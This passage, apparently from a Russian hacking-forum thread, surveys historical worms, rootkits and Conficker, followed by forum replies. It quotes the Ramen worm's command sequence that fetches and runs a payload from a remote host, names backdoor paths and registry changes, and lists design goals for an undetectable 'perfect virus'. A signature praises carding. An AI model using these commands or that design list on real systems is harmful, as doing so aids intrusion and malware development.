Так как успех червя был огромнейшим, то как всегда появилась новая модификация. Особо опасная – CodeRed.c,
появившаяся 4 августа 2001 года. С наступлением 1 октября вирус перезагружает все зараженные машины. Также
CodeRed оставляет бэкдор, копируя cmd.exe (командный интерпретатор Windows) в некоторые каталоги ISS:

\inetpub\scripts\root.exe
\progra~1\common~1\system\MSADC\root.exe

Далее червь устанавливает в систему тронского коня, который хранится в теле червя и весит он 8Kb.
Действет он следующим образом:
Отключает защиту файлов (Windows File Protection), записывая в ключ реестра следующий ключ:
HKLM\SoftwareMicrosoftWindowsNtCurrentversionWinlogon\SFCDisable
И открывает на всеобщее обозрение каталоги на дисках C: и D:
CodeRed.c использует более усовершенстованый алгоритм поиска IP-адресов для атаки на них, а модификации “.a”, “.b” и “.c”
использовали довольно таки убогий метод поиска – случайный .

· I-Worm.Nimda
Nimda тоже поражала IIS-серверы, а также распространяться по e-mail с помощю бага в IE. Сам вирус представляет собой
исполняемый PE EXE файл, размером ~57 – 58 килобайт с именем ReadMe.exe. Вирус написан на MS C++, а для активации червя
используется ошибка в Internet Explorer (IE) – пользователь даже ен замечает как червь проникает в его систему. Также
в теле червя содержится следующая строка:

Concept Virus(CV) V.5, Copyright(C)2001 R.P.China

Далее червь внедряется в систему:
Разбрасывает свои копии в:
(/windows/ - директория ОС Windows)
/windows/mmc.exe
/windows/riched20.dll // уничтожая оригинальный файл операционной системы riched20.dll)
/windows/load.exe // load.exe подключается в автозапуск системы, с помощю
редактирования system.ini: shell=explorer.exe load.exe -dontrunold
Далее червь также копирует себя во временную директорию windows с именами типа MEP*.TMP и MA*.TMP.EXE.
Например, mepE099.TMP.exe, mep01A2.TMP и т.д
Далее для своего рапространения вирус использует процесс EXPLORER.exe, маскируя свои действия.
Далее идет рассылка писем с достаточно продуманным алгоритмом .
Слудеющий шаг – распространение по локальной сети.
Вирус обнаруживает локальные и установленные диски, затем создает файлы со случайными имена и расширениями *.EML и
*.NWS (форматы писем email’a). Таким образом компьюетры содержат сотни копий вирусов. Далее ищет WEB-страницы
(*.html, *.asp, *.htm) именами default, index. main, readme и создает с ним в одной директории файл readme.eml.
затем модифицирет страницу так, что при просмотре ее пользователь заражается просто зайдя на сайт.
А внедряется червь на IIS-серверы так – отдает команду tftp, временно задействует tftp-сервер и с помощью нешл
загружает в машину свою копию – admin.dll, затем запускает и все.
Также Nimda открывает все локальные диски для просмотра всем желающим и создает учетную запись Guest –
которая будет иметь полный доступ к файлам системы

[Анатомия скользких UNIX - червей]

Существуют легенды о том, что вирусов под *nix-like системы (Linux, FreeBSD, OpenBSD, Solaris и т.д) не существует.
Хочу опровергнуть это мнение! Вирусы для UNIX-систем существует, но из 100% всех-всех вирусов, 0,1% для UNIX-систем!
Я подготовил небольшой обзорик самых известных *nix-like вирусов.

Вирусы:

· Bliss
Вирус Bliss был создаг в начале 1997 года. Хочется заметить, что этот вирус скорей надо назвать трояном. Вирус ищет
исполняемые файлы и добваляет в инх свой код. После появления вируса появились его модификации.

· W32/Lindose
Вирус из семейства кроссплатформенных – умеет заражать как Windows, так и Linux системы. Заражает PE (windows) и
ELF (linux файлы), внедряя в них свой код. Но есть одно “но” – вирус можно запустить только на Windows-системе.

Черви:
· Ramen
Самым первым червем, реально поработившим unix-системы стал Ramen, названный в честь макарон .
В январе 2001 года стали заметны странные вещи, а именно обнаружение нового и довольно таки странного червя,
поражающего nix-системы под управлением Red Hat Linux. Червь поразил много крупных серверов.

Вот некоторые из них:
1. Лабораторию NASA по исследованию реактивного движения
2. Университет A&M
3. SuperMicro - компания, которая производила какие-то аппаратные средства.

Неплохой размах... Но странно не это, а то, что:
1. Он не передавал управление в руки хакера, а просто дефейсил сайт, заменяя
главную страницу, оставляя смешную надпись "Hackers looooooooooooove noodles", что переводится как
"Хакеры любят олухов" или "Хакеры любят дураков" )))). Также использовалась очень веселая
картинка макарон "top ramen"
P.S: забыл сказать, что привелегий у червя было достаточно - root'а всегда всем
хватет, чтобы управлять сервером, рассказав о заражении VX-мэйкеру ))) Это разве не странно???
2. Червь пытается исправить уязвимости системы, тем
самым избегается повторное заражение!
3. Он какбы специально делал так, чтобы его заметили.
Я не говорю о дефейсах, но говорою о 27374-порте, на котором он и сидел.
Не думаю, что автор был просто плохим VX-мэйкером, а хотел всем показать червя )
Сам червь действовал по следующему алгоритму:
1. Подключение к 21 порту (FTP) жертвы, используя программу SYN-сканирования Synscan
2. Узнает какая версия Red Hat установлена на машине
3. Если установлена Red Hat 6.2, то он атакует демоны wu-ftpd и rpc.statd
4. Если установлен Red Hat 7.0, то будет атакован lpd
5. Если атака прошла успешна и червь получил доступ к командному интерпретатору, то он отправляет
ему следующие команды:
Mkdir /usr/src/.poop;cd /usr/src/.poop
Export Term=vt100
Lynx –source://IP_ADRESS:27374 > /usr/src/.poop/ramen.tgz /////IP_ADRESS – IP-адрес взломанной машины.
Cp ramen.tgx /tmp
Gzip –d ramen.tgz;tar –xvf ramen.tar;./start.sh
Echo Eat Tour Ramen! |mail emal@hotmail.com //////e-mail адресс на hotmail.rru
6. Как видно из команд, червь, а точнее “чевривый скрипт” – Start.sh открывает 27374 порт, устанавливает
туда свой сервер HTTP 0.9, с помощью которого и будет распространяться.
7. Далее Ramen удаляет (в зависимости от версии RedHat) rpc.statd или lpd
8. Затем добавляет в файл /etc/ftpusers две новые записи anonymous и ftp
9. И последний шаг червя – дефейc "Hackers looooooooooooove noodles" + картинка с макаронами :
О следующих червях я расскажу не так подробно – я рассказл о ramen’e, чтобы Вы поняли принцип действия *nix-червей

· Li0n

Этот червь предназначен для атаки на BIND 8.2 –8.2.3, с импользованием уязвимости с обработкой TSIG-Запросов .
После успешного внедрения в систему червь устанавливает на него набор хак-утилит t0rn, устанавливает протрояненые
некоторых программ, которые фальсис\фицируют данные комманд ls и netstat. Если на сервере есть inetd, червь открывает
60008 и 33567 порты, с помощю которых хакеров получает root-доступ. А копии файлов /etc/shadow и /etc/passwd
отправляются на адресс эллектронной почты

· Adore
Этот же черввь использовал намного больше уязвимостей: wu-ftpd, BIND, rpc-statd и LPRng. После удачного проникновения
в систему червь фальсифицирует программу ps. Далее на e-mail вирьмэйкерв отправляются данные о ситеме, некоторые файлы,
включая history (.bash_history). После некоторых махинаций с учетными записями червь приступает к поиску новых жертв

· Slapper
Также известен под именами Modap и Cinik. Использует ошибку в OpenSSL 0.9.6d и более ранних.
Червь поражал серверы под управлением Apache, на которых используются бажные SSL-библиотеки, спомощю которых
он получал привелегии nobody (www, apache и т.д). Чеврь был создан для DDoS-атак – TCP-флудинга и UDP-флудингом)

· Cheese
Вот я и рассказал о вредоносных червях. Но бывают “добрые” черви – я серьезно. Первым таким полезным и добрым
UNIX-червем стал Cheese. Онрозыскивает ПК с открытм 10008 портом, где доступен рут-шелл. Исправляет ошибку в BIND,
вносит изменения в /etc/inetd.conf и продолжает благородные странствия

[Руткиты – бриллиантовые маскировщики]

Итак, мы добрались до руткитов. Этим я тоже хочу перепугать наивных пользователей . Руткит – это программа, созданная
для маскировки – после установки руткита на Ваш компьютер, процессы, записи в реестре, файлы, открытые соединения,
сервисы, модули и т.д будут невидны никоим образом. Это одно и тоже, что вирус или троян совершенно невидим!
Никак. Некоторые руткиты модифицируют даже образ HDD (жетского диска) так, что папка хакера не будет видна НИКАКИМ
ОБРАЗОМ, включая то, что размер папки не будет “показан” – руткит сфальсифицурует размер HDD так, что о секретной папки
не будет даже намека. Итак, как же работают руткиты?
Очень часто руткиты добиваются своей невидимости за счет перехвата API-функций (WinAPI), а также очень часто можно
втсретить “Ядерные” руткиты – руткиты, выполненные в виде драйвера уровня ядра. Лично я использую windows-руткиты
как Hacker Defender (by Holy Father & RATTER/29a), NT-rootkit (by Greg Hoglund) и FU (by Fuzen_OP). Вообщем-то, добро
в кибернетичесом мире проигрывает. Руткит практически НЕВОЗМОЖНО найти в системе. Его нельзя случайно заметить,
его надо целенапрвлено искать. На данный момент сущсетвует парочка антируткитов, но они очень и очень сырые :(,
и не в особом состоянии найти вражеский руткит… Такая утилита – VICE, которая снимает хуки с WinAPI. Если тебе
захотелось узнать больше о windows-руткитах, то топай на www.rootkit.com - там ты найдешь огромное количество
руткитов, статей на эту тему и т.д. Также существуют руткиты и под *nix-системы, но найти их гооораааааздо проще,
в этом тебе поможет программа chrootkit или rkhunte. Но опять таки, легче найти публичные руткиты, а приватные
остаются в тени... >:|

[Совершенное оружие VX-мэйкеров]

Теперь давайте поразмыслим о совершенном вирусе – что он должен делать. Если у тебя есть какие-то идеи,
то пиши мне (dr.pascal[at]mail.ru) - я с удовольствием пообщаюсь с тобой на тему совершенных вирусов.
Итак, в процессе написания этой статьи в голову пришли следующие мысли о совершенном вирусе.
- Вирус должен быть сетевым, т.е червем – это поможет ему распространяться быстрее
- Вирус должен заражать компьютеры методом атаки на бажные сервисы, причем уязвимость НЕ должна быть
известной НИКОМУ (типа RPC DCOM)
- Вирус должен уметь оставлять бэкдор
- Вирус должен быть тихим и незаметным – цель вируса не стать популярным, а поработить как можно больше машин
- Вирус должен уметь все, что нужно для вытягивания паролей, секретной информации, DDoS-атак.
- Вирус должен уметь заражать LIB-файлы.
- Вирус должен иметь функции руткита – быть АБСОЛЮТНО невидимым
- Вирус должен быть зашифрованым
- Вирус должен быть пермутационным, полиморфическим
- Вирус должен уметь заражать компьютеры через локальную сеть, используя баги
- Вирус должен уметь думать, обладать хоть каким-то искусственным интелектом
(да, хоть это и сложно – но он же СОВЕРШЕННЫЙ?!)
- Вирус должен иметь функции стелс-вируса (читать выше)
- Вирус должен уметь защищаться
- Вирус должен уничтожать ВСЕ, что препятствует его размножению (антивирусы, если его обнаружат)
- Вирус должен обладать следующим алгоритмом:
При записи файлов на дискету/компакт диск он должен их заразить, чтобы распространиться
до следующего пользователя.
- Вирус должен уметь обновляться через интернет если это потребуется
- Вирус должен обходить ЛЮБОЙ файрвол, иначе это приведет к его гибели
- Вирус должен быть маленьким и юрким – иметь очень маленький размер
- Вирус должен быть быстрым в плане размножения
- Вирус может (!!!) быть кроссплатформенным – заражать Winodws, *NIX – ситсемы, а также ОС,
используемые мобильными телефонами, распространение через блютус.
Желательно заражать системы с закрытым исходным кодом. В Unix-системе вирус будет легко найти
- Вирус не должен контактировать с пользователем НИКАКИМ методом
- О вирусе НИКТО не должен знать, кроме его создателя (и меня конечно )
Это пока все идеи, которые пришли ко мне в голову. Мне действительно интересно будет узнать о
Вашем мнении “Какой должен быть совершенный вирус”, а если что, да и исходный код такого вируса пролистать

[Последнее слово]

Ну чтоже в заключении? А то, что антивирусы работают днем и ночью и каждый вирус у них на мушке, файрволы
совершенствуются с каждым днем, но проблема в том, что хакеры и вирусмэйкеры не стоят на месте. Сказать честно,
в этой кибернетической войне пока проигрывает добро, а зло порабощает компьютеры, тем самым хакеры орудуют
огромнейшими ботнетами… На этой грустной ноте (для некотрых веселой ) я заканчиваю свой рассказ. Если
Вам понравилась статья и помог Вам чем-то, то я действительно рад

P.S: Особо умных просьба не критиковать, статья нацелена на подробный сказ о истории,
принипах действия, размножения вирусов и другого зловредного ПО, а простым юзерам, которые не знакомы с
понятиями DDoS, эксплойт и т.д я попытался рассказать о всем подробнее, чтобы не оставалось никаких вопросов.

P.S.S. Копирайта нету.
__________________
[CENTER][COLOR="Red"]Возможно Вы остановите меня, но Вы не остановите нас всех.[/COLOR]
[B]Жизнь хороша - когда кардишь не спеша.[/B]
[COLOR="Black"][B]Как дам по репе.[/B][/COLOR]
[SIGPIC]https://hacker-pro.net/signaturepics/sigpic19004_3.gif[/SIGPIC][/CENTER]
Пользователь вне форума    
  , 21:51   #4
Banned
 
Локация: Россия,Москва
Регистрация: 27.12.2009
Сообщений: 2,941

Репутация: 0 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Paradox,+1...статейка рульная!....
Самый интерессный вирус,который я описал,пока что,это - Trojan.Win32. FraudPack.akqu(таким же цветом я его и выделил в статье своей...
Вот это просто мастерство!!!!....Сделать копию под Интернет Секьюрити 2010...Это просто гениально,придумано!!!!И, вообще,подобные вирусы просто уникальны,в моем понимании!!!:wink:
__________________
[B][I][FONT="Book Antiqua"][COLOR="Gray"][URL="https://hacker-pro.net/showthread.php?t=13237"]Сила[/URL] - не показывать то,что ты сильней...[/COLOR][/FONT][/I][/B]
[COLOR="Red"][FONT="Comic Sans MS"]Комплексная защита от вирусов[/FONT][/COLOR] [B][FONT="Georgia"]by[/FONT][/B] [COLOR="Blue"][FONT="Comic Sans MS"]Alexfedoruk[/FONT][/COLOR] - [URL="https://hacker-pro.net/downloads.php?do=file&id=3375"][COLOR="Magenta"][U][FONT="Georgia"]ЗДЕСЬ[/FONT] [/U][/COLOR][/URL]
Пользователь вне форума    
  , 14:49   #5
Форумчанин
 
Регистрация: 25.02.2010
Сообщений: 39

Репутация: 7 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

alexfedoruk, Ты в своей теме писал, если мы сомневаемся в какомто файле, то его надо заливать на интернет сканеры. Но иногда например нет такой возможности или просто желания, возможноли установить на компьютер несколько антивирусников????
 
Пользователь вне форума    
  , 15:37   #6
Местный
 
Аватар для zloyqwe
 
Локация: UA
Регистрация: 29.08.2009
Сообщений: 198

Репутация: 37 / 1
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

спасибо за тему,было интересно почитать!
__________________
http://serforall.ru - онлайн сериалы
Пользователь вне форума    
  , 16:04   #7
Banned
 
Локация: Россия,Москва
Регистрация: 27.12.2009
Сообщений: 2,941

Репутация: 0 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Цитата:
Сообщение от Igor_15 Посмотреть сообщение
alexfedoruk, Ты в своей теме писал, если мы сомневаемся в какомто файле, то его надо заливать на интернет сканеры. Но иногда например нет такой возможности или просто желания, возможноли установить на компьютер несколько антивирусников????
2 антивируса...неее...нет желания,и надо ЗНАТЬ,как их устанавливать!!!:glass:Например,я не знаю,как 2 антивируса установить в одной машине...да и не нужно это!!!:yes:Главное,адекватный подход к безопасности и можно не боятся виров!!!:wink:
Даже,если бы установить 2 антивируса,то онлайн-сканеры в любом случае будут лучше....т.к. у тебя 2 антивируса,а в онлайн-сканере их 35-37)))):glass:....
Если файл весит свыше 20 мб(сканер не может больше принять),то можем только расчитывать на свой антивирус + утилита дополнительная,которые работают в связке....Например - вирусов они не обнаружили...Тогда можем устанавливать!..Если мы нормально установили,т.е.антивирус или фаервол не ругались,то тогда комп мы просканируем своим антивирусом после установки файла(проги,игры и т.д.)...и как в заключение - просканируем утилитой от Доктора Вэба - CureIt!Скачать можно здесь ....Если и CureIt! ничего не нашёл,то смело пользуйтесь файлом(прогой,игрой)....или можно использовать другие утилиты:wink:.....
Также не забываем о песочницах!!!!
__________________
[B][I][FONT="Book Antiqua"][COLOR="Gray"][URL="https://hacker-pro.net/showthread.php?t=13237"]Сила[/URL] - не показывать то,что ты сильней...[/COLOR][/FONT][/I][/B]
[COLOR="Red"][FONT="Comic Sans MS"]Комплексная защита от вирусов[/FONT][/COLOR] [B][FONT="Georgia"]by[/FONT][/B] [COLOR="Blue"][FONT="Comic Sans MS"]Alexfedoruk[/FONT][/COLOR] - [URL="https://hacker-pro.net/downloads.php?do=file&id=3375"][COLOR="Magenta"][U][FONT="Georgia"]ЗДЕСЬ[/FONT] [/U][/COLOR][/URL]

Последний раз редактировалось alexfedoruk; 17.06.2010 в 16:21.
Пользователь вне форума    
  , 16:19   #8
Местный
 
Аватар для Hellight
 
Локация: Your brain
Регистрация: 27.03.2010
Сообщений: 276

Репутация: 41 / 1
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

А где же великий Downadup!!??
__________________
HELLo, my friend!
Ждите новинку от Google: индексацию личных сообщений вконтакте;)
Пользователь вне форума    
  , 16:33   #9
Продвинутый
 
Регистрация: 30.06.2009
Сообщений: 1,407

Репутация: 85 / 2
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Интересная тема и многим будет полезна, думаю многие согласятся с данным утверждением, так что ОГРОМНОЕ спасибо за труды, а на будущее хороших идей для написания подобных и других грамотных, интересных, а главное полезных статей!
 
Пользователь вне форума    
  , 16:39   #10
Banned
 
Локация: Россия,Москва
Регистрация: 27.12.2009
Сообщений: 2,941

Репутация: 0 / 0
Exclamation Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Цитата:
Сообщение от Hellight Посмотреть сообщение
А где же великий Downadup!!??
Это что такое?
О чём ты?:glass:

Добавлено через 5 минут
Да и еще по теме...
Тема ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ будет всегда пополняться вирусами, т.е. тема будет всегда в режиме онлайн.....по мере поступления вирусов в реестры!!!
Сейчас еще работа кипит только над созданием базы данных,которую я пишу....:glass:
Когда я базу закончу,то тема будет пополняться свеженькими вирусняками,т.е.по мере их детекта....:glass:
__________________
[B][I][FONT="Book Antiqua"][COLOR="Gray"][URL="https://hacker-pro.net/showthread.php?t=13237"]Сила[/URL] - не показывать то,что ты сильней...[/COLOR][/FONT][/I][/B]
[COLOR="Red"][FONT="Comic Sans MS"]Комплексная защита от вирусов[/FONT][/COLOR] [B][FONT="Georgia"]by[/FONT][/B] [COLOR="Blue"][FONT="Comic Sans MS"]Alexfedoruk[/FONT][/COLOR] - [URL="https://hacker-pro.net/downloads.php?do=file&id=3375"][COLOR="Magenta"][U][FONT="Georgia"]ЗДЕСЬ[/FONT] [/U][/COLOR][/URL]

Последний раз редактировалось alexfedoruk; 17.06.2010 в 16:39. Причина: Добавлено сообщение
Пользователь вне форума    
  , 16:39   #11
Продвинутый
 
Регистрация: 30.06.2009
Сообщений: 1,407

Репутация: 85 / 2
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

alexfedoruk, этот великий Downadup есть у тебя в описании... он же Conficker ,Downup, Kido. =)
 
Пользователь вне форума    
  , 16:52   #12
Banned
 
Локация: Россия,Москва
Регистрация: 27.12.2009
Сообщений: 2,941

Репутация: 0 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Цитата:
Сообщение от sibrik Посмотреть сообщение
alexfedoruk, этот великий Downadup есть у тебя в описании... он же Conficker ,Downup, Kido. =)
ага,понятно)))а то у меня вся голова ими уже забита:hmcool:
Ну...ну...ну а в чем суть вопроса?:wink:...Про Kido,по-моему,я писал...но если это другое,то не забываем,что База только пишется....еще всё впереди,друзья!!!!
Мимо,никто не должен пройти из вирусов.....я постараюсь...
И не забываем,что в теме только актуальные вирусы....а актуальными вирусами я считаю вирусы с этого дня и до 2008-07г.г.:yes:
Как вы уже заметили названия вирусов есть общепринятыми,если названия рознятся среди антивирусов,то в конце статьи по каждому вирусу есть описания как они будут называться другими антивирусами:yes:

Добавлено через 4 минуты
По вопросу Downadup
Conficker.A
Спойлер
Сетевой червь, эксплуатирующий уязвимость, описанную в бюллетене MS08-067. Червь может также загружать и выполнять произвольные файлы.

Другие названия:
Worm:Win32/Conficker.A (MS OneCare), W32.Downadup (Symantec)


При запуске, червь Win32/Conficker.A создает копию в директории %System% с произвольным именем. Win32/Conficker.A c проверяет использует ли зараженная машина Windows 2000. Если да, то червь внедряет свой код в процесс services.exe.

Если операционная система отлична от Windows 2000, червь создает службу со следующими характеристиками:


Имя службы: netsvcs
Путь к файлу: %System%\svchost.exe -k netsvcs

Также создает следующий ключ реестра:

HTML highlight
HKLM\SYSTEM\CurrentControlSet\Services\netsvcs\Parameters\ServiceDll = "%System%\<worm executable filename>.dll"
Win32/Conficker.A подключается к домену trafficconverter.biz и пытается загрузить и выполнить следующие файлы:

http://trafficconverter.biz/<censored>/loadadv.exe
__________________
[B][I][FONT="Book Antiqua"][COLOR="Gray"][URL="https://hacker-pro.net/showthread.php?t=13237"]Сила[/URL] - не показывать то,что ты сильней...[/COLOR][/FONT][/I][/B]
[COLOR="Red"][FONT="Comic Sans MS"]Комплексная защита от вирусов[/FONT][/COLOR] [B][FONT="Georgia"]by[/FONT][/B] [COLOR="Blue"][FONT="Comic Sans MS"]Alexfedoruk[/FONT][/COLOR] - [URL="https://hacker-pro.net/downloads.php?do=file&id=3375"][COLOR="Magenta"][U][FONT="Georgia"]ЗДЕСЬ[/FONT] [/U][/COLOR][/URL]

Последний раз редактировалось alexfedoruk; 17.06.2010 в 16:52. Причина: Добавлено сообщение
Пользователь вне форума    
  , 21:51   #13
Banned
 
Локация: Россия,Москва
Регистрация: 27.12.2009
Сообщений: 2,941

Репутация: 0 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

ВНИМАНИЕ!!!!
В реестрах уже появились свежаки вирусов!!!!
Смотрим тему:wink:...под каждым вирусом стоит дата их детекта...их всего 7
Это я,так сказать,забежал наперёд...
Завтра продолжу писать менее свежие описания вирусов:glass:
__________________
[B][I][FONT="Book Antiqua"][COLOR="Gray"][URL="https://hacker-pro.net/showthread.php?t=13237"]Сила[/URL] - не показывать то,что ты сильней...[/COLOR][/FONT][/I][/B]
[COLOR="Red"][FONT="Comic Sans MS"]Комплексная защита от вирусов[/FONT][/COLOR] [B][FONT="Georgia"]by[/FONT][/B] [COLOR="Blue"][FONT="Comic Sans MS"]Alexfedoruk[/FONT][/COLOR] - [URL="https://hacker-pro.net/downloads.php?do=file&id=3375"][COLOR="Magenta"][U][FONT="Georgia"]ЗДЕСЬ[/FONT] [/U][/COLOR][/URL]
Пользователь вне форума    
  , 23:07   #14
Местный
 
Аватар для Skorpid
 
Локация: пещера
Регистрация: 15.04.2010
Сообщений: 132

Репутация: 16 / 1
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

отличная тема,нечего сказать =)надоело уже с каждым найденым неизвестным вирусом лесть в гугл)
__________________
...неважно хорошо это или плохо важно грустно это закончиться или весело
Пользователь вне форума    
  , 16:05   #15
Новичок
 
Регистрация: 10.03.2010
Сообщений: 19

Репутация: 10 / 0
По умолчанию Re: Обсуждение темы: ВИРУСЫ: ОПИСАНИЕ,ИХ ЗНАЧЕНИЕ

Цитата:
Сообщение от Skorpid Посмотреть сообщение
отличная тема,нечего сказать =)надоело уже с каждым найденым неизвестным вирусом лесть в гугл)
Вполне согласен савтором!
 
Пользователь вне форума    

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Alexfedoruk alexfedoruk Блоги 196 25.04.2011 15:38



Часовой пояс GMT +2
Powered by vBulletin® 3.x.x Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.

Copyright © 2008 - 2013 «HPC» Реклама на сайте Правила Форума Пользовательское соглашение Работа на сайте
При копировании материалов ставьте ссылку на источник
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.